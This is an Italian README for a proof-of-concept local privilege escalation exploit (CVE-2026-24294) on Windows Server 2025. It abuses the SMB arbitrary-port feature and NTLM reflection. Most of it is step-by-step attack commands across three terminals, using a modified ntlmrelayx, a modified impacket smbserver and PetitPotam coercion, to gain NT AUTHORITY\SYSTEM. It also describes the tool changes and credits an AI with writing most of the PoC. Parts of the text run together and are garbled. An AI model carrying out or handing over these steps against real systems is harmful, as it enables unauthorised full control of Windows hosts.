
# PoC di escalation dei privilegi locali per CVE-2026-24294 PoC di escalation dei privilegi locali per CVE-2026-24294, che sfrutta la porta arbitraria SMB e la riflessione NTLM per ottenere privilegi SYSTEM su Windows Server 2025.
Escalatazione locale dei privilegi su Windows Server 2025 tramite riflessione NTLM, sfruttando la funzionalità di porta arbitraria SMB introdotta in Windows 11 24H2 / Server 2025.
Windows 11 24H2 / Server 2025 ha introdotto una funzionalità del client SMB che consente connessioni su porte TCP arbitrarie (net use \\host\share /tcpport:PORT). Combinata con il multiplexing delle sessioni SMB (MS-SMB2 Sezione 3.2.4.2), questa funzionalità abilita la riflessione NTLM locale — un utente con privilegi limitati può indurre un servizio privilegiato (LSASS) ad autenticarsi verso un server SMB controllato dall'attaccante su una porta non standard, per poi inoltrare l'autenticazione NTLM catturata al servizio SMB reale sulla porta 445.
Impatto: NT AUTHORITY\SYSTEM da qualsiasi utente locale.
Sistemi interessati: Windows Server 2025 (configurazione predefinita). Windows 11 24H2 applica la firma SMB, bloccando il relay.
LSASS (SYSTEM) ──NTLM──► Client SMB ──TCP:12345──► smbserver.py (nostro)
│
▼ relay blob NTLM
Servizio SMB (:445) ◄────────────────── ntlmrelayx.py
← sessione SYSTEM
net use apre una connessione TCP verso il nostro server SMB su una porta personalizzata\\127.0.0.1\shareAprire 3 terminali.
Terminale 1 — Avviare ntlmrelayx (in ascolto sulla porta RAW 6666, inoltra a SMB su localhost):
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server --no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server -t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666
Terminale 2 — Avviare smbserver modificato (in ascolto sulla porta 12345, inoltra NTLM alla porta 6666):
python smbserver.py test . -port 12345 -smb2support -username user -password user -relay-port 6666
Terminale 3 — Eseguire l'exploit:
:: Monta la condivisione su porta personalizzata (apre connessione TCP persistente)
net use \\127.0.0.1\test /tcpport:12345 /user:user user
:: Induce LSASS ad autenticarsi al nostro server SMB
PetitPotam.exe 127.0.0.1 localhost 2
L'output di whoami da ntlmrelayx mostrerà NT AUTHORITY\SYSTEM.
PetitPotam/ — Sorgente PetitPotam modificato. Due modifiche rispetto all'upstream:
df1941c5-fe89-4e79-bf10-463657acf44d (interfaccia EFSRPC WS2025)\pipe\efsrpcEfsRpcEncryptFileSrv), nome condivisione hardcoded come testsmbserver.py — smbserver impacket modificato con il flag -relay-port. Aggancia SMB2 SESSION_SETUP per catturare una seconda autenticazione NTLM su una connessione multiplexata e inoltrarla a un server relay RAW (ntlmrelayx --raw-port).Questo PoC è stato scritto principalmente da un'IA (GLM 5.1) basandosi sulla ricerca e sulle tecniche descritte in: